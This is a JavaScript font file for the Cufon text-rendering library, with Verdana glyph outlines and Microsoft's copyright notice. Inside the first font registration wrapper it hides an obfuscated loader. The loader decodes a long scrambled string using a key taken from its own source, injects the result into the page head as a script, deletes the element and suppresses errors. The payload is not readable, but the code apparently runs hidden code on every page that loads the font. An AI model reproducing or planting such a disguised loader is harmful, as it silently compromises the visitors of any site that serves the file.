"d":"93,0r-63,0r0,-197r63,0r0,197xm104,-226r-43,0r-62,-65r0,-4r61,0","w":123},{"d":"175,0r-153,0r0,-46r43,0r0,-169r-43,0r0,-47r153,0r0,47r-43,0r0,169r43,0r0,46xm232,-44v30,-3,33,-30,33,-62r0,-108r-51,0r0,-48r119,0r0,185v2,71,-69,93,-139,76r0,-51v15,0,19,10,38,8","w":362},{"d":"88,73v-53,3,-58,-41,-58,-94r0,-176r63,0r0,197r-26,0v-10,37,28,48,57,34r0,35v-9,3,-26,4,-36,4xm95,-226r-67,0r0,-48r67,0r0,48","w":123},{"d":"145,-267v81,-1,127,54,127,136v0,82,-46,138,-127,136v-94,-2,-131,-58,-127,-166r184,0v-6,-74,-102,-69,-140,-26r-7,0r0,-59v28,-14,58,-21,90,-21xm87,-108v-1,56,67,87,100,43v9,-12,14,-26,16,-43r-116,0","w":289},{"d":"140,-340v48,0,81,60,43,91r92,249r-70,0r-18,-53r-97,0r-18,53r-68,0r92,-249v-36,-31,-4,-91,44,-91xm171,-101r-32,-94r-32,94r64,0xm140,-262v14,0,24,-12,24,-25v1,-14,-10,-26,-24,-26v-14,0,-25,12,-24,26v0,13,10,25,24,25","w":279},{"d":"239,0r-73,0r-56,-86r-17,21r0,65r-63,0r0,-197r63,0r0,87r68,-87r73,0r-71,85","w":241},{"d":"239,0r-73,0r-56,-86r-17,21r0,65r-63,0r0,-274r63,0r0,164r68,-87r73,0r-71,85","w":241},{"d":"187,69v-55,14,-111,-5,-98,-69r-67,0r0,-46r43,0r0,-169r-43,0r0,-47r153,0r0,47r-43,0r0,169r43,0r0,46r-48,0v-11,39,30,47,60,34r0,35","w":196},{"d":"146,-44v35,0,49,-18,49,-54r0,-164r68,0r0,167v0,68,-45,100,-117,100v-72,0,-117,-31,-116,-100r0,-167r68,0r0,164v-1,36,14,53,48,54","w":292},{"d":"79,-62v-1,36,56,28,70,10r0,-41v-28,5,-68,0,-70,31xm150,-130v-6,-50,-85,-23,-118,-16r0,-47v65,-15,180,-24,180,59r0,134r-63,0r0,-21v-33,41,-138,33,-134,-36v4,-67,70,-68,135,-73xm183,-295r0,4r-62,65r-43,0r44,-69r61,0","w":240},{"d":"220,-147r-19,29r-57,-38r2,62r-37,0r1,-61r-55,37r-19,-29r62,-37r-62,-37r19,-29r55,37r-1,-61r37,0r-1,61r55,-37r20,30r-63,36"},{"d":"109,-69r-64,134r-39,0r35,-134r68,0","w":130},{"d":"189,-291r-65,0r0,-48r65,0r0,48xm88,-132v0,65,39,93,108,89r0,-52r-52,0r0,-49r121,0r0,129v-24,9,-69,20,-105,20v-88,0,-142,-50,-142,-136v0,-84,58,-137,145,-136v42,1,68,7,101,23r0,62v-33,-9,-49,-37,-93,-36v-54,1,-83,33,-83,86","w":291},{"d":"126,-46v12,-1,28,-5,37,-11r0,-140r64,0r0,197r-64,0r0,-22v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53xm173,-226r-43,0r-62,-65r0,-4r61,0","w":256},{"d":"222,0r-189,0r0,-262r68,0r0,211r121,0r0,51","w":229},{"d":"158,-205v-3,58,10,87,71,81r0,43v-58,-4,-75,22,-71,82v4,63,-56,73,-123,68r0,-39v49,5,66,-10,66,-63v0,-36,23,-56,53,-67r0,-4v-35,-13,-57,-37,-53,-87v3,-40,-25,-46,-66,-43r0,-40v67,-5,126,6,123,69"},{"d":"208,-360r-57,69r-44,0r-56,-69r46,0r33,40r32,-40r46,0xm223,0r-190,0r0,-262r190,0r0,51r-122,0r0,45r113,0r0,51r-113,0r0,64r122,0r0,51","w":245},{"d":"128,-262v95,-1,153,42,153,131v0,88,-60,133,-155,131r-93,0r0,-119r-28,0r0,-41r28,0r0,-102r95,0xm101,-49v72,5,110,-18,110,-82v0,-64,-39,-87,-110,-82r0,53r56,0r0,41r-56,0r0,70","w":298},{"d":"173,-267v82,0,153,71,153,152v0,81,-72,152,-153,152v-81,0,-152,-71,-152,-152v0,-81,70,-152,152,-152xm174,4v64,0,118,-55,118,-119v0,-64,-55,-120,-118,-120v-64,0,-119,56,-119,120v0,64,55,119,119,119xm142,-116v-7,56,61,58,87,31r3,0r0,36v-56,32,-134,3,-134,-67v0,-68,78,-101,134,-68r0,36v-31,-23,-96,-28,-90,32","w":346},{"d":"93,0r-63,0r0,-197r63,0r0,197xm123,-295r0,4r-62,65r-43,0r44,-69r61,0","w":123},{"d":"275,0r-70,0r-18,-53r-97,0r-18,53r-68,0r97,-262r78,0xm171,-101r-32,-94r-32,94r64,0","w":279},{"d":"93,0r-63,0r0,-274r63,0r0,274xm205,-274r-51,104r-41,0r28,-104r64,0","w":188},{"d":"153,-267v84,0,135,52,135,136v0,82,-51,136,-135,136v-84,0,-135,-54,-135,-136v0,-84,51,-136,135,-136xm153,-44v47,0,65,-38,65,-87v0,-50,-19,-87,-65,-87v-47,0,-65,38,-65,87v0,50,18,87,65,87xm226,-292r-52,0r0,-48r52,0r0,48xm132,-292r-52,0r0,-48r52,0r0,48","w":306},{"d":"63,-114v-4,101,85,142,179,113r0,34v-120,28,-220,-29,-217,-147v2,-92,59,-153,150,-153v91,0,143,58,146,150v0,33,-12,72,-24,93r-89,0r-3,-14v-15,8,-22,15,-46,14v-43,0,-64,-39,-64,-87v0,-64,59,-112,107,-76r0,-11r41,0r0,144r30,0v32,-82,-2,-188,-97,-181v-69,5,-110,49,-113,121xm171,-57v14,0,22,-5,30,-14r0,-89v-34,-20,-65,6,-62,49v2,32,4,54,32,54","w":346},{"d":"153,-267v84,0,135,52,135,136v0,82,-51,136,-135,136v-84,0,-135,-54,-135,-136v0,-84,51,-136,135,-136xm153,-44v47,0,65,-38,65,-87v0,-50,-19,-87,-65,-87v-47,0,-65,38,-65,87v0,50,18,87,65,87xm215,-361r0,4r-62,65r-43,0r44,-69r61,0","w":306}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-1658-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("zyEdOf$j29}CznMlif&`8y8}F4$dEf}CF4.`29|,E>eY1Wj3FsS!HT1`FsS!HT1dFsS!HyP4FsS!HT8jFsS!Hy>fL&gdHQPd$dgdHQxM$&gdHQPW1>gdHQx_$_}ViTh!E_EViThgHT$ViThg$TMzFsS!HTtWFsS!HySWFsS!HTxfFsS!HT|fidgdHQxNEMgdHQPj1>gdHQP`H>gdHQxM6>gdH_hg6>gdHQP!H>gdHQPd$>gdHQx3E>gdHQPo1dgdHQPdH>gdHQPj6>gdH_hg1dgdHQxNHMgdHQPgE,DViThg$_EViTh!Ef|ViThhxnQP&ys8.z-H$6Ut|*TS>9F1E2OVi[L=73_NMf,:;5)YDC#!g`Wjd4oKJ(le}rwgH_EVF&gdHQP!$&gdHQP!H&gdHQx31MgdHQP4HdgdHQPo$4MViTh!1_7ViThgHy|ViTh!EQi,FsS!HThdFsS!HTPdFsS!Hy1KFsS!HTHJFsS!HTPoFsS!HyS4FsS!Hy&7FsS`HQPWFsS!HThJFsS!HTiNFsS!HyP!FsS!Hy$MFsS!HTEfFsS!HyH`FsS!HyPjFsS!Hy$NFsS!HTt4FsS!HT&_FsS`HQ84FsS!HTSKFsS!Hy8`FsS!Hy|_FsS!Hy.NFsS!HT>fFsS!H_&7EMDViThg$4&ViThg$Q7ViThgH9.ViThg$fHDFs>fEfSdFsS!HTt`FsS!HyH!FsS!HTH!FsS!Hy1!FsS!Hy8WFsS!Hy8JFsS!HTHW6&gdHQ8g6>JViThg$TxViTh!1T>ViThg$9$&FsS!HT1JFsS!H9E7FsS`HT8`.&gdHQx7HdgdHQPjE&gdHQPj$>gdHQPoH>gdHQPW1dgdHQxNE&gdHQPW$Qt;FsS!HT.NFsS!HTVjFsS!HTS`FsS!Hy84FsS!Hyt!FsS!Hy&_FsS!HT8W6MgdHQPW$dgdHQPg6&gdHQx31dgdHQ&f1,.ViThgEfEViThgHf.ViThg$WEViThgHWPdFsS!HT.7FsS!HyP`O&gdHQ&fE>gdHQPgHM.|FsS!Hy|7FsS!HTtoFsS!Hy$fE>gdHQP!E>gdHQPWE&gdHQPoH&gdHQPo$>gdHQPgE&gdHQP`$>gdHQP`1dgdHQPo1MgdHQP!HdgdHQPW$>gdHQPjE>gdHQP`HMgdHQxN1fjeV>gdHQPj$P}ViTh!Ef&3FsS!Hy|MtMgdHQPWEMgdHQP4E&gdHQP41>gdHQP46&gdHQ&3Hn7ViThgH_iViThg$y$ViThgEf|ViThgHQi-FsS!HyPgFsS!HTx7FsS!H9PgFsS`Hy&_FsS!HTH4FsS!Hy>MFsS!HTPJ>dgdHQxM1f$ViTh!1_xViTh!E_&ViThgHy$d9QMViThgHQ.ViThg$_iViTh!ET.ViThW$4S_FsS!HT$3>NMViT8!H9|CU>gdHQx_H>gdHQxf$s7ViTh!EQ|ViThg$y.EFsS!HT&M2MdViThg1TxSFsS!Hy.7V&gdHQPoHW&ViThgHT&:FsS!HyHjFsS!HT8J|MgdH_hg$&!#1>gdHQPoEMgdHQPoHfxViTh!14$ViTh!14.NF`>ViTh`H9.8FsS!HytdFn.tO`DjHQEViThg$f.ViThg19EQFsS!HTx3FsS!HT>NFsS!Hy&fUNVfFsS!HyE3FsS!HTN`SdgdHQPoE>gdHQx_HdgdHQPd$MgdHQx3EMgdHQx71,MViThgHTE4FsS!Hy1`|nxViTh!EQ7ViTh!ET=lFsS!HytJFsS!HySdFsS!H9E_FsS!Hy&NFsS!HTt!FsS!HyEfFsS!HyHKFsS!HTVJFsS!Hy8gFsS!Hy1dFsS!Hy&MFsS!HT>MV`iViThg$_&ViThgHQEViThg$W7ViTh!E_$ViTh!14PCFsS!HTEMH3&ViTh!1TiViThg$_|ViTh!1_|ViTh!E_iViThg$9&ViTh!1T7ViThg$T|ViTh!1_SoFsS!Hy8oFsS!HTtgLMgdHQ8g6&gdHQxf1o;ViTh!ETxViTh!EQ&ViTh!ETiViT8!HT7ViThgHT|ViThgH_72FsS!HyHoFsS!HyHJTMgdHQP4H&gdHQP!6&gdHQxfE>gdHQPdHW$$FsS!HT>3FsS!Hy>7FsS!Hy>_FsS!HTH`FsS!HT.fFsS!HT7fFsS!HyHdFsS!HTHK2dgdHQP`E>>ViTh!ETP5-&gdHQP`H&gdHQxf6Sg}FsS!HT&7FsS!HTP!FsS!HyPJFsS!Hy>Nt>gdHQPWE>gdHQxN$NxViTh!EQH3-,$!OyMjzn83z*g;UThYVQd3-,hYOQd!-fgMOfij2ng,U98CE3J,OsM!2sH}[ojl291:13J#2Wj#F3=w6,ioid!CzTe:UW:Czd!COf|!14g;E9JjFnJ_O4de-3DV-f$3O>!COo.,LnK)FnJ_1fdd2d!COo.,FnJd2`NN-4NCiy>Win7YO4$7iyM#O3J:Oo$jOf&DE*N;Ef}`zQD;Uy!lz`D;z9iO1dD;F>j}V&D;FFj;znN=")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":255,"face":{"font-family":"Verdana","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 8 4 3 5 4 4 2 4","ascent":"288","descent":"-72","x-height":"6","bbox":"-10 -361 433 74.906","underline-thickness":"37.0898","underline-position":"-5.97656","unicode-range":"U+0020-U+2122"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 2006 Microsoft Corporation. All Rights Reserved.
 * 
 * Trademark:
 * Verdana is either a registered trademark or a trademark of Microsoft
 * Corporation in the United States and/or other countries.
 * 
 * Manufacturer:
 * Carter & Cone
 * 
 * Designer:
 * Matthew Carter
 * 
 * License information:
 * http://www.microsoft.com/typography/fonts/
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"193,-295r-56,67r-40,0r-25,-67r29,0r22,45r42,-45r28,0xm153,0r-158,0r5,-24r146,-146r-112,0r6,-26r154,0r-6,23r-146,147r117,0","w":189},{"d":"194,-130r-58,0r-30,130r-35,0r30,-130r-59,0r6,-25r58,0r18,-77r-93,0r7,-30r221,0r-6,30r-94,0r-17,77r58,0","w":221},{"d":"58,-240v25,1,41,-2,47,-22r25,0r-38,163r-29,0r28,-121r-37,0xm276,-262r-184,262r-29,0r183,-262r30,0xm315,-39r-29,0r-9,39r-27,0r9,-39r-84,0r8,-32r106,-96r27,0r-25,105r29,0xm265,-62r17,-71r-81,71r64,0","w":360},{"d":"105,0r-104,0r6,-25r34,0r49,-211r-34,0r6,-26r103,0r-5,26r-35,0r-49,211r35,0xm182,-301r-127,0r6,-26r127,0","w":151},{"d":"232,-294r-27,0r-23,-45r-42,45r-29,0r55,-66r40,0xm67,-103v-12,43,1,82,48,80v54,-2,72,-35,83,-79r37,-160r35,0v-35,108,-19,263,-161,267v-69,2,-91,-46,-76,-110r36,-157r35,0","w":263},{"d":"233,-232r-132,0r-18,76r114,0r-7,29r-113,0r-30,127r-35,0r61,-262r167,0","w":206},{"d":"178,0r-166,0r61,-262r35,0r-54,232r131,0xm186,-361r-63,66r-27,0r44,-66r46,0","w":200},{"d":"83,-175v40,-43,141,-36,121,48r-30,127r-33,0r30,-142v-1,-53,-74,-23,-94,-5r-34,147r-33,0r45,-196r33,0xm209,-295r-63,66r-27,0r44,-66r46,0"},{"d":"174,-228r-27,0r-22,-46r-43,46r-28,0r54,-67r41,0xm156,-92v40,63,-51,117,-124,91v-12,-4,-21,-7,-29,-11v4,-11,2,-28,9,-36v22,27,116,45,119,-10v-11,-44,-104,-11,-104,-74v0,-69,100,-84,155,-54v-4,10,-2,27,-9,34v-23,-32,-137,-30,-104,27v21,16,73,11,87,33","w":187},{"d":"228,72v-60,15,-73,-52,-44,-87r-7,-59r-112,0r-43,74r-37,0r156,-262r46,0r35,262r-17,0v-12,16,-13,48,18,48v9,0,20,-4,27,-6r-6,27v-7,2,-11,2,-16,3xm173,-102r-16,-129r-75,129r91,0","w":245},{"d":"129,-202v46,0,75,28,74,75v-2,75,-37,130,-113,132v-46,1,-75,-28,-74,-75v3,-75,40,-132,113,-132xm95,-22v52,-3,72,-47,74,-102v0,-31,-15,-51,-45,-50v-52,2,-72,48,-74,102v0,30,16,51,45,50xm202,-295r-63,66r-27,0r44,-66r46,0","w":218},{"d":"204,-102v0,72,-61,120,-138,101v3,-8,2,-22,8,-27v52,24,97,-19,96,-72v0,-33,-27,-46,-62,-46r6,-25v37,1,64,-16,65,-50v1,-36,-54,-36,-72,-14v-8,10,-16,25,-20,44r-44,191r-33,0v20,-75,33,-162,58,-229v19,-49,141,-71,145,2v1,35,-31,57,-57,67v28,7,48,25,48,58","w":223},{"d":"203,-295r-55,67r-40,0r-25,-67r28,0r22,45r43,-45r27,0xm50,-75v0,72,87,53,119,26r-7,37v-54,29,-147,21,-147,-57v0,-98,89,-162,179,-116v-4,11,-2,28,-9,36v-13,-13,-31,-24,-58,-24v-48,0,-77,48,-77,98","w":187},{"d":"81,-167v30,-21,52,-34,95,-27v-4,10,-4,23,-9,32v-37,-10,-70,7,-92,23r-32,139r-33,0r45,-196r33,0","w":153},{"d":"15,-63v0,-94,76,-169,165,-125r8,-36r-64,0r5,-22r64,0r6,-28r33,0r-6,28r32,0r-5,22r-32,0r-52,224r-33,0r5,-21v-42,41,-126,35,-126,-42xm50,-69v-4,60,69,48,97,21r26,-113v-14,-7,-27,-12,-47,-12v-54,0,-72,50,-76,104","w":224},{"d":"227,-295r-58,66r-25,0r43,-66r40,0xm156,-295r-58,66r-25,0r42,-66r41,0xm129,-202v46,0,75,28,74,75v-2,75,-37,130,-113,132v-46,1,-75,-28,-74,-75v3,-75,40,-132,113,-132xm95,-22v52,-3,72,-47,74,-102v0,-31,-15,-51,-45,-50v-52,2,-72,48,-74,102v0,30,16,51,45,50","w":218},{"d":"212,0r-41,0r-72,-234r-54,234r-33,0r61,-262r52,0r66,214r49,-214r33,0xm31,43v36,14,79,3,72,-47r28,0v3,59,-46,92,-105,73","w":269},{"d":"175,-267v62,-2,102,36,100,98v-4,99,-51,171,-152,174v-62,2,-100,-36,-99,-98v3,-101,52,-170,151,-174xm129,-23v75,0,107,-64,109,-141v1,-46,-24,-75,-68,-75v-75,0,-107,65,-110,141v-2,46,24,75,69,75","w":283},{"d":"220,-360r-56,66r-40,0r-25,-66r29,0r22,45r42,-45r28,0xm78,-132v64,4,114,-7,114,-65v0,-42,-49,-36,-91,-36xm230,-205v0,47,-35,81,-74,92r75,113r-41,0r-69,-105r-49,0r-25,105r-35,0r61,-262v71,1,156,-13,157,57","w":250},{"d":"169,-120v15,-57,-52,-70,-86,-40v-12,11,-21,23,-26,40r112,0xm52,-95v-22,85,90,82,132,47r-7,36v-20,7,-37,13,-61,16v-8,19,-6,44,22,44v8,0,19,-4,26,-6r-5,27v-35,10,-76,3,-76,-36v0,-11,5,-22,7,-29v-44,-3,-75,-29,-75,-75v-1,-67,52,-131,119,-131v61,0,79,51,63,107r-145,0","w":214},{"d":"42,-50v0,47,80,20,99,2r13,-56v-51,6,-112,2,-112,54xm56,-192v54,-15,156,-22,137,59r-31,133r-32,0r4,-21v-27,29,-130,45,-127,-23v3,-76,76,-81,152,-86v10,-30,-10,-43,-42,-43v-21,0,-50,10,-67,14xm155,-229r-25,0r-35,-66r42,0","w":216},{"d":"67,-4v3,59,-45,92,-103,73v3,-8,2,-21,8,-26v34,16,75,-1,68,-43r-30,0r45,-196r33,0r-7,29v30,-21,52,-34,95,-27v-4,10,-4,23,-9,32v-37,-10,-70,7,-92,23r-31,135r23,0","w":153},{"d":"83,-175v40,-43,141,-36,121,48r-30,127r-33,0r30,-142v-1,-53,-74,-23,-94,-5r-34,147r-33,0r52,-224r-30,0r5,-22r30,0r6,-28r33,0r-6,28r56,0r-5,22r-57,0"},{"d":"194,-228r-27,0r-23,-46r-42,46r-29,0r55,-67r40,0xm169,-120v15,-57,-52,-70,-86,-40v-12,11,-21,23,-26,40r112,0xm52,-95v-22,85,90,82,132,47r-7,36v-58,29,-162,23,-162,-59v0,-67,52,-131,119,-131v61,0,79,51,63,107r-145,0","w":214},{"d":"35,43v32,14,78,3,72,-39v-57,3,-90,-20,-92,-73v-3,-98,89,-162,179,-116v-4,11,-2,28,-9,36v-13,-13,-31,-24,-58,-24v-48,0,-77,48,-77,98v0,72,87,53,119,26r-7,37r-28,10v3,57,-47,90,-104,71","w":187},{"d":"107,-274r-64,274r-33,0r63,-274r34,0xm160,-361r-63,66r-27,0r44,-66r46,0","w":98},{"d":"85,-90r-43,0r12,-50r42,0","w":130},{"d":"190,-228r-27,0r-22,-46r-43,46r-28,0r54,-67r41,0xm50,-75v0,72,87,53,119,26r-7,37v-54,29,-147,21,-147,-57v0,-98,89,-162,179,-116v-4,11,-2,28,-9,36v-13,-13,-31,-24,-58,-24v-48,0,-77,48,-77,98","w":187},{"d":"169,-120v15,-57,-52,-70,-86,-40v-12,11,-21,23,-26,40r112,0xm52,-95v-22,85,90,82,132,47r-7,36v-58,29,-162,23,-162,-59v0,-67,52,-131,119,-131v61,0,79,51,63,107r-145,0xm186,-229r-35,0r8,-34r35,0xm113,-229r-35,0r8,-34r35,0","w":214},{"d":"212,0r-41,0r-72,-234r-54,234r-33,0r61,-262r52,0r66,214r49,-214r33,0xm235,-361r-63,66r-27,0r44,-66r46,0","w":269},{"d":"169,-120v15,-57,-52,-70,-86,-40v-12,11,-21,23,-26,40r112,0xm52,-95v-22,85,90,82,132,47r-7,36v-58,29,-162,23,-162,-59v0,-67,52,-131,119,-131v61,0,79,51,63,107r-145,0xm157,-229r-25,0r-35,-66r42,0","w":214},{"d":"245,-262r-7,30r-137,0r-17,74r137,0r-6,29r-138,0r-23,99r138,0r-7,30r-173,0r61,-262r172,0xm186,-295r-25,0r-35,-66r42,0"},{"d":"232,-360r-55,66r-41,0r-24,-66r28,0r22,45r42,-45r28,0xm245,-262r-7,30r-137,0r-17,74r137,0r-6,29r-138,0r-23,99r138,0r-7,30r-173,0r61,-262r172,0"},{"d":"107,-274r-64,274r-33,0r63,-274r34,0xm151,-92r-40,0r10,-45r40,0","w":165},{"d":"135,-250v27,-1,39,-19,46,-45r29,0v-10,37,-36,67,-79,68v-38,0,-59,-27,-53,-68r29,0v-4,25,4,46,28,45xm129,-202v46,0,75,28,74,75v-2,75,-37,130,-113,132v-46,1,-75,-28,-74,-75v3,-75,40,-132,113,-132xm95,-22v52,-3,72,-47,74,-102v0,-31,-15,-51,-45,-50v-52,2,-72,48,-74,102v0,30,16,51,45,50","w":218},{"d":"78,-132v64,4,114,-7,114,-65v0,-42,-49,-36,-91,-36xm230,-205v0,47,-35,81,-74,92r75,113r-41,0r-69,-105r-49,0r-25,105r-35,0r61,-262v71,1,156,-13,157,57xm35,43v36,14,79,3,72,-47r28,0v3,59,-46,92,-105,73","w":250},{"d":"30,43v33,14,78,3,71,-43r-89,0r61,-262r35,0r-54,232r131,0r-7,30r-49,0v1,56,-49,87,-105,69","w":200},{"d":"185,-196v45,3,65,-7,63,-52r27,0v0,50,-19,70,-63,75r-39,173r-33,0r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0r-30,141v0,52,74,24,94,5","w":237},{"d":"175,-267v62,-2,102,36,100,98v-4,99,-51,171,-152,174v-62,2,-100,-36,-99,-98v3,-101,52,-170,151,-174xm129,-23v75,0,107,-64,109,-141v1,-46,-24,-75,-68,-75v-75,0,-107,65,-110,141v-2,46,24,75,69,75xm228,-295r-35,0r8,-34r35,0xm155,-295r-35,0r8,-34r35,0","w":283},{"d":"270,-360r-58,66r-25,0r43,-66r40,0xm199,-360r-58,66r-25,0r43,-66r40,0xm67,-103v-12,43,1,82,48,80v54,-2,72,-35,83,-79r37,-160r35,0v-35,108,-19,263,-161,267v-69,2,-91,-46,-76,-110r36,-157r35,0","w":263},{"d":"224,-86v-2,96,-139,109,-215,69v5,-12,3,-31,11,-40v36,51,197,44,159,-40v-39,-31,-134,-10,-136,-82v-2,-86,131,-108,202,-68v-4,11,-3,29,-10,37v-34,-43,-185,-37,-147,42v36,33,137,11,136,82xm219,-361r-63,66r-27,0r44,-66r46,0","w":246},{"d":"15,43v31,14,78,3,71,-39v-32,4,-63,-7,-83,-16v4,-11,2,-28,9,-36v22,27,116,45,119,-10v-11,-44,-104,-11,-104,-74v0,-69,100,-84,155,-54v-4,10,-2,27,-9,34v-23,-32,-137,-30,-104,27v29,21,98,8,97,60v-1,34,-25,53,-52,63v2,56,-48,90,-105,71","w":187},{"d":"229,-311v0,30,-19,52,-40,63r33,248r-36,0r-9,-74r-112,0r-43,74r-37,0r146,-246v-55,-27,-14,-114,45,-114v29,0,53,20,53,49xm173,-102r-16,-129r-75,129r91,0xm160,-264v21,1,43,-22,43,-43v0,-16,-13,-32,-30,-30v-42,-5,-63,71,-13,73","w":245},{"d":"257,-262r-125,147r-27,115r-35,0r26,-111r-59,-151r38,0r45,118r99,-118r38,0xm203,-295r-35,0r8,-34r35,0xm130,-295r-35,0r8,-34r35,0","w":221},{"d":"178,0r-166,0r61,-262r35,0r-54,232r131,0xm172,-92r-41,0r11,-45r40,0","w":200},{"d":"208,-295r-55,67r-40,0r-25,-67r28,0r22,45r43,-45r27,0xm169,-120v15,-57,-52,-70,-86,-40v-12,11,-21,23,-26,40r112,0xm52,-95v-22,85,90,82,132,47r-7,36v-58,29,-162,23,-162,-59v0,-67,52,-131,119,-131v61,0,79,51,63,107r-145,0","w":214},{"d":"178,0r-166,0r61,-262r35,0r-54,232r131,0","w":200},{"d":"216,-281v-1,19,-13,33,-26,41r32,240r-36,0r-9,-74r-112,0r-43,74r-37,0r144,-242v-34,-25,1,-77,43,-77v23,0,44,16,44,38xm173,-102r-16,-131r-75,131r91,0xm162,-252v14,0,26,-11,26,-26v0,-10,-8,-20,-19,-19v-29,-4,-38,45,-7,45xm233,-360r-53,36r-27,0r36,-36r44,0","w":245},{"d":"265,-101r-96,0r0,96r-29,0r0,-96r-96,0r0,-28r96,0r0,-95r29,0r0,95r96,0r0,28","w":294},{"d":"287,-196r-29,0r-45,196r-35,0r30,-129r-131,0r-30,129r-35,0r45,-196r-29,0r5,-24r30,0r10,-42r35,0r-10,42r131,0r9,-42r35,0r-10,42r30,0xm214,-158r9,-38r-131,0r-8,38r130,0","w":270},{"d":"73,-262v103,-5,198,3,194,101v-4,101,-70,165,-184,161r-71,0r31,-131r-33,0r6,-24r32,0xm54,-29v109,9,176,-33,176,-129v0,-67,-56,-79,-129,-75r-18,78r63,0r-5,24r-63,0","w":275},{"w":126},{"d":"181,-316v26,-1,39,-18,45,-44r29,0v-10,37,-36,66,-78,67v-40,1,-57,-26,-54,-67r30,0v-4,25,4,45,28,44xm175,-267v62,-2,102,36,100,98v-4,99,-51,171,-152,174v-62,2,-100,-36,-99,-98v3,-101,52,-170,151,-174xm129,-23v75,0,107,-64,109,-141v1,-46,-24,-75,-68,-75v-75,0,-107,65,-110,141v-2,46,24,75,69,75","w":283},{"d":"15,-70v0,-91,80,-161,164,-118v2,-13,22,-7,35,-8v-37,111,-14,294,-182,268v-10,-2,-19,-3,-28,-6v4,-10,2,-26,9,-33v37,17,106,19,118,-21v4,-12,8,-25,11,-39v-40,39,-127,32,-127,-43xm50,-76v0,59,69,48,98,22r25,-107v-62,-34,-123,13,-123,85xm187,-295r-47,66r-45,0r64,-66r28,0","w":223},{"d":"8,43v33,14,78,2,71,-43r-8,0r53,-232r-93,0r7,-30r221,0r-6,30r-94,0r-52,229v2,57,-48,91,-105,72","w":221},{"d":"234,-223r-168,223r-40,0r179,-232r-149,0r7,-30r180,0","w":228},{"d":"166,-256v13,-1,20,-15,23,-29r21,0v-8,30,-18,52,-50,54v-28,2,-31,-25,-52,-28v-14,1,-20,14,-23,29r-22,0v6,-30,23,-52,51,-54v26,-1,30,25,52,28xm129,-202v46,0,75,28,74,75v-2,75,-37,130,-113,132v-46,1,-75,-28,-74,-75v3,-75,40,-132,113,-132xm95,-22v52,-3,72,-47,74,-102v0,-31,-15,-51,-45,-50v-52,2,-72,48,-74,102v0,30,16,51,45,50","w":218},{"d":"236,-360r-56,66r-40,0r-25,-66r28,0r22,45r43,-45r28,0xm205,0r-205,0r8,-32r202,-200r-153,0r7,-30r195,0r-7,30r-204,202r163,0","w":246},{"d":"216,-294r-27,0r-23,-45r-42,45r-29,0r55,-66r40,0xm224,-86v-2,96,-139,109,-215,69v5,-12,3,-31,11,-40v36,51,197,44,159,-40v-39,-31,-134,-10,-136,-82v-2,-86,131,-108,202,-68v-4,11,-3,29,-10,37v-34,-43,-185,-37,-147,42v36,33,137,11,136,82","w":246},{"d":"141,-274r-70,99r-25,0r51,-99r44,0","w":96},{"d":"250,-360r-55,66r-40,0r-25,-66r28,0r22,45r43,-45r27,0xm212,0r-41,0r-72,-234r-54,234r-33,0r61,-262r52,0r66,214r49,-214r33,0","w":269},{"d":"45,72r-36,0r57,-83r-35,-185r34,0r27,146r94,-146r36,0xm184,-229r-35,0r8,-34r35,0xm111,-229r-35,0r8,-34r35,0","w":212},{"d":"227,-228r-27,0r-22,-46r-43,46r-28,0r54,-67r40,0xm300,-196r-92,196r-30,0r-20,-152r-81,152r-31,0r-12,-196r34,0r5,152r80,-152r28,0r19,152r65,-152r35,0","w":294},{"d":"67,-103v-12,43,1,82,48,80v54,-2,72,-35,83,-79r37,-160r35,0v-35,108,-19,263,-161,267v-69,2,-91,-46,-76,-110r36,-157r35,0xm232,-361r-63,66r-27,0r44,-66r46,0","w":263},{"d":"188,-169v32,-43,144,-51,144,30v0,13,-3,27,-6,40r-144,0v-10,44,10,76,55,76v29,0,56,-16,76,-25r-7,36v-45,21,-130,27,-151,-20v-27,35,-146,64,-146,-11v0,-75,74,-78,148,-81v9,-32,-5,-49,-43,-49v-23,0,-48,9,-66,14r6,-33v41,-11,122,-19,134,23xm299,-123v13,-53,-50,-67,-84,-39v-12,9,-21,23,-27,39r111,0xm44,-50v8,48,84,19,104,-2v-1,-17,-1,-31,2,-47v-48,2,-104,1,-106,49xm269,-295r-63,66r-27,0r44,-66r46,0","w":343},{"d":"15,-63v0,-94,76,-169,165,-125v1,-13,21,-7,34,-8r-62,268r-33,0r22,-94v-37,39,-126,36,-126,-41xm50,-69v-4,61,70,44,98,19r25,-111v-14,-7,-27,-12,-47,-12v-54,0,-73,50,-76,104","w":224},{"d":"194,-295r-56,67r-40,0r-25,-67r29,0r22,45r42,-45r28,0xm156,-92v40,63,-51,117,-124,91v-12,-4,-21,-7,-29,-11v4,-11,2,-28,9,-36v22,27,116,45,119,-10v-11,-44,-104,-11,-104,-74v0,-69,100,-84,155,-54v-4,10,-2,27,-9,34v-23,-32,-137,-30,-104,27v21,16,73,11,87,33","w":187},{"d":"168,-239v71,70,40,244,-76,244v-45,0,-77,-26,-77,-70v0,-84,97,-136,160,-86v-2,-29,-15,-57,-32,-72r-52,28r-9,-16r47,-26v-17,-16,-31,-22,-49,-34r0,-3r49,0r26,21r41,-23r9,17xm116,-143v-69,0,-97,123,-19,121v56,-1,69,-53,76,-104v-14,-11,-34,-17,-57,-17","w":220},{"d":"41,-134r32,-140r34,0r-27,116r38,-26r-7,28r-38,25r-30,131r-33,0r25,-107r-36,25r6,-28","w":98},{"d":"162,-256v13,-1,20,-15,23,-29r21,0v-8,30,-18,52,-50,54v-28,2,-30,-28,-52,-28v-14,0,-20,13,-22,29r-22,0v6,-30,22,-53,50,-